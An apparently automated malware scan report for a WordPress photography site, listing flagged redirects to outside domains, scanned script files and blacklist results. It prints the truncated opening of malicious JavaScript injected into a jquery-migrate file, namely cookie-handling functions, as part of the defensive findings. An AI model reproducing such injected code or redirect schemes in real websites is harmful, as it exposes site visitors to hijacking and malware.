Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://epiclightphoto.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: epiclightphoto.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Sep 2014 12:16:26 GMT Location: http://ph21us.ru/ Server: Apache Content-Length: 293 Content-Type: text/html; charset=iso-8859-1 | malicious |
URL: http://ph21us.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: ph21us.ru Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Sep 2014 12:16:26 GMT Location: http://doctorsfjxww.com Server: nginx/1.6.2 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://epiclightphoto.com/ | 200 OK Content-Length: 49072 Content-Type: text/html | clean |
http://epiclightphoto.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 97310 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8108 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Depositormengarslife() {
function Expocarus(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function Afillatepost(name) { var afrodita = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return afrodita ? decodeURIComponent(afrodita[1]) : undefined; } var cookie = Antivirus reports:
| ||
http://epiclightphoto.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.9.2 | 200 OK Content-Length: 1294 Content-Type: application/javascript | clean |
https://maps.googleapis.com/maps/api/js?v=3&sensor=false&ver=1 | 200 OK Content-Length: 5089 Content-Type: text/javascript | clean |
http://epiclightphoto.com/wp-content/plugins/t2t-toolkit/js/modernizr.js?ver=2.1.10 | 200 OK Content-Length: 11156 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-content/plugins/wp-spamshield/js/jscripts.php | 200 OK Content-Length: 883 Content-Type: application/x-javascript | clean |
http://epiclightphoto.com/wp-includes/js/hoverIntent.min.js?ver=r7 | 200 OK Content-Length: 2024 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 16156 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.9.2 | 200 OK Content-Length: 10566 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-content/plugins/t2t-toolkit/js/_shared.js?ver=2.1.10 | 200 OK Content-Length: 65709 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-content/plugins/t2t-toolkit/js/shortcodes.js?ver=2.1.10 | 200 OK Content-Length: 11107 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4 | 200 OK Content-Length: 5197 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-includes/js/jquery/ui/jquery.ui.effect.min.js?ver=1.10.4 | 200 OK Content-Length: 13880 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-includes/js/jquery/ui/jquery.ui.effect-slide.min.js?ver=1.10.4 | 200 OK Content-Length: 1682 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=epiclightphoto.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://epiclightphoto.com/
Result: epiclightphoto.com is not infected or malware details are not published yet.
Result: epiclightphoto.com is not infected or malware details are not published yet.